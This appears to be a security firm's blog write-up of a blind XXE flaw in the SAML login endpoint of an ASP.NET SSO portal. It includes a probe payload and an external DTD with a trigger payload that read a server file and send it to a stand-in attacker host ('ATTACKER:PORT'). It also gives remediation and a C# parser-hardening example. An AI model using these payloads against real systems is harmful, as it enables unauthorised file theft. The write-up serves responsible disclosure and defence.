June 2024. Tags: Web Security, SAML, XXE

Discovering a Blind XXE in an Industrial Control System SSO Portal

A critical XML External Entity vulnerability in a SAML authentication endpoint led to out-of-band server file exfiltration.

Overview

During a security research engagement, we discovered a critical vulnerability in a web application's login portal. The portal used the SAML protocol for SSO authentication, backed by an XML parser that failed to properly restrict external entity processing. This allowed us to exploit a blind XXE vulnerability and perform sensitive file reads on the underlying Windows server.

Reconnaissance

Thorough reconnaissance is foundational to any security assessment. While enumerating the target domain's directory structure, we identified an endpoint, logout.aspx, that returned an HTTP 500 error. The .aspx extension and the error page immediately told us two things about the environment:

  • The web server was running on Windows
  • The application was built on the ASP.NET framework

Examining the endpoint's behaviour revealed verbose error messages in the response. The returned page source indicated that the endpoint accepted POST requests with two key parameters during the authentication flow: SAMLRequest and SAMLResponse.

Identifying the Vulnerability

The SAMLResponse parameter contained an XML string, Base64-encoded and then URL-encoded, that the backend used for SAML authentication. If the backend XML parser does not validate its input or disable external entity processing, an attacker can inject malicious XML to interact with the server.

We tested this hypothesis with a basic XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>

The server responded with an error indicating it could not resolve the remote host http://evilhost. This confirmed that the XML parser was processing our injected entities, a clear indicator of an XXE vulnerability.

We modified the payload to point to a server under our control and received a callback, confirming the vulnerability was exploitable.

Escalation: Out-of-Band File Exfiltration

With XXE confirmed, the next step was demonstrating real-world impact. The server did not reflect file contents in its responses, making this a blind XXE. Direct data retrieval wasn't possible through the application's response body.

To work around this limitation, we used an out-of-band (OOB) exfiltration technique. OOB exfiltration causes the vulnerable application to send data to an external server through a secondary channel, rather than returning it in the HTTP response.

The Technique

We hosted a malicious DTD file on our server that instructs the XML parser to:

  1. Read the contents of a target file on the server
  2. Send those contents as a URL parameter to our listener

External DTD (hosted on attacker server):

<!ENTITY % file SYSTEM "file:///C:\windows\win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
  'http://ATTACKER:PORT/?data=%file;'>">
%eval;
%exfil;

Trigger payload (Base64 + URL encoded in SAMLResponse):

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % asd SYSTEM "http://ATTACKER:PORT/exploit.dtd">
  %asd;
]>
<foo>&send;</foo>

Execution Flow

  1. The SAML endpoint processes our payload and the XML parser fetches our external DTD
  2. The DTD instructs the parser to read C:\windows\win.ini from the local filesystem
  3. The file contents are sent as a query parameter to our listener
  4. We decode the exfiltrated data from our server logs

The result: full contents of the target file retrieved through a blind XXE, confirmed via our server logs.

Impact

This vulnerability allowed an unauthenticated attacker to:

  • Read arbitrary files from the server's filesystem
  • Potentially access configuration files containing database credentials, API keys, or other secrets
  • Map the internal network through SSRF by targeting internal hosts
  • Compromise the SSO authentication mechanism that gates access to the entire application

Remediation

This vulnerability was responsibly disclosed to the application owner, who implemented the following fixes:

  • Disabled external entity processing in the XML parser
  • Disabled DTD processing entirely where not required
  • Implemented input validation on SAML parameters
  • Added server-side egress filtering to prevent OOB callbacks
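The first two fixes, as an added example in C# (not the application's own code): the SAMLResponse parameter is Base64-decoded and then parsed with an XmlReaderSettings that prohibits DTDs and resolves nothing, shown beside the permissive configuration that makes the attack possible. The probe payload and the host example.invalid are constructed for the demonstration.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

static class SamlXmlHardening
{
    // Constructed probe: a DOCTYPE with a parameter entity pointing at an
    // external DTD, i.e. the shape of an XXE test after Base64 decoding.
    const string Probe =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
        "<!DOCTYPE foo [ <!ENTITY % asd SYSTEM \"http://example.invalid/x.dtd\"> %asd; ]>" +
        "<foo/>";

    // Permissive: DTDs are parsed and external resources are fetched over the
    // network. Shown only for contrast; never use this for untrusted input.
    public static XmlReaderSettings PermissiveSettings() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Parse,
        XmlResolver = new XmlUrlResolver(),
    };

    // Hardened: any DOCTYPE is rejected outright and no external resource is
    // ever resolved. A SAML assertion has no legitimate need for a DTD, and
    // setting both explicitly avoids relying on defaults that changed across
    // .NET versions.
    public static XmlReaderSettings HardenedSettings() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Prohibit,
        XmlResolver = null,
    };

    // Decode the SAMLResponse form parameter (URL decoding already done by the
    // framework) and load it with the given reader settings.
    public static XmlDocument ParseSamlResponse(string samlResponseParam, XmlReaderSettings settings)
    {
        string xml = Encoding.UTF8.GetString(Convert.FromBase64String(samlResponseParam));
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            var doc = new XmlDocument { XmlResolver = null }; // no resolver on the DOM side either
            doc.Load(reader);
            return doc;
        }
    }

    static void Main()
    {
        string param = Convert.ToBase64String(Encoding.UTF8.GetBytes(Probe));
        try
        {
            ParseSamlResponse(param, HardenedSettings());
            Console.WriteLine("parsed (unexpected for a payload carrying a DOCTYPE)");
        }
        catch (XmlException ex)
        {
            // Expected path: the reader throws as soon as it sees the DOCTYPE,
            // before any entity is declared or any URL is contacted.
            Console.WriteLine("rejected: " + ex.Message);
        }
    }
}
```

Running the same probe through PermissiveSettings() instead would make the parser attempt the outbound fetch, which is the behaviour the engagement observed.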

Key Takeaways

  • SAML implementations are a frequent source of XXE vulnerabilities because they inherently process XML
  • Error messages that reveal server-side technology (ASP.NET, framework versions) assist attackers in tailoring their approach
  • Blind XXE doesn't mean unexploitable — OOB exfiltration techniques can extract data without any visible response
  • XML parsers should always disable external entity processing by default


Redmount Cyber specializes in identifying vulnerabilities like these before attackers do.
